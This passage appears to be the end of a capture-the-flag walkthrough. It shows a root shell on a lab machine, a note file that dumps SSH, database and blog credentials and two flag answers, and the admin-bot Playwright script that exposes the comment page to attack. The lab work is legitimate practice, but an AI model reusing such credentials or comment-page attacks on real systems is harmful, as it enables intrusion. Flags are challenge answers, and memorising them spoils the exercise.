uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/home/scotty # cd /
/ # cd /root
~ # ls -la
total 32
drwx------ 5 root root 4096 Apr 3 16:58 .
drwxr-xr-x 22 root root 4096 Apr 3 11:48 ..
lrwxrwxrwx 1 root root 9 Apr 3 10:06 .ash_history -> /dev/null
drwxr-xr-x 3 root root 4096 Apr 3 11:31 .cache
-rw-r--r-- 1 root root 29 Apr 3 17:54 .cns_secret
drwxr-xr-x 4 root root 4096 Apr 3 11:49 .config
lrwxrwxrwx 1 root root 9 Apr 3 12:24 .mariadb_history -> /dev/null
drwx------ 3 root root 4096 Apr 3 11:52 .pki
lrwxrwxrwx 1 root root 9 Apr 3 12:56 .viminfo -> /dev/null
-rw-r--r-- 1 root root 746 Apr 3 14:47 note.txt
-rwxrwx--- 1 root root 242 Apr 3 13:54 root.flag
~ # cat note.txt
ssh://[email protected]:BvIpFDyB4kNbkyqJGwMzLcK
ssh://[email protected]:qDCsBTj30cQyityMh3Rnyys
ssh://[email protected]:aYTmcORsUrmwaKa7C2DBLCh
ssh://[email protected]:uuUoqAETern4v5tW2iMFs47

mariadb://root@localhost:p8RuoQGTtlKLAjuF1Tpy5wX

mariadb://typecho_u@typecho_db@localhost:QLTkbviW71CSRZtGWIQdB6s

typecho://[email protected]:n3nPbqEOhs6eTcchyqXTXWi
typecho://[email protected]:DihPQiQqNO75vv8zNBzLwUm

flag{4b5d61daf3e2e5ba57019f617012ad0919c2a6c29e11912aeadef2820be8f298}
canyoureachthefinals -> sha256

flag{8c5daa407626d218e962041dd8fd8f37913e56e32a6f06725da403175be0b9ff}
youfinallyreachedthefinals -> sha256

THE FINALS is a great FPS game. A lot of inspiration comes from games. Try it on http://reachthefinals.com/
```

Afterword

/opt holds the script that periodically visits the comments page.

It uses chromium-browser in headless mode to automate logging in to the admin backend and taking a screenshot:

```python
from playwright.sync_api import sync_playwright

import time

STAFF_USERNAME = 'staff'
STAFF_PASSWORD = 'n3nPbqEOhs6eTcchyqXTXWi'

def run(playwright):
    # Headless Chromium driven by Playwright; this is the "administrator" that reads the comments
    browser = playwright.chromium.launch(headless=True, executable_path='/usr/bin/chromium-browser')
    page = browser.new_page()

    page.goto('http://thefinals.hmv/blog/admin/manage-comments.php')

    # Log in with the staff account, which lands on the comment management page
    page.fill('//form[@name="login"]//input[@id="name"]', STAFF_USERNAME)
    page.fill('//form[@name="login"]//input[@id="password"]', STAFF_PASSWORD)

    page.click('//p[@class="submit"]//button[@type="submit"]')

    page.wait_for_load_state('networkidle')

    # Save a screenshot of the logged-in page under the web root
    timestamp = int(time.time())
    page.screenshot(path=f'/var/www/html/screenshots/{timestamp}.png')

    browser.close()

with sync_playwright() as playwright:
    run(playwright)
```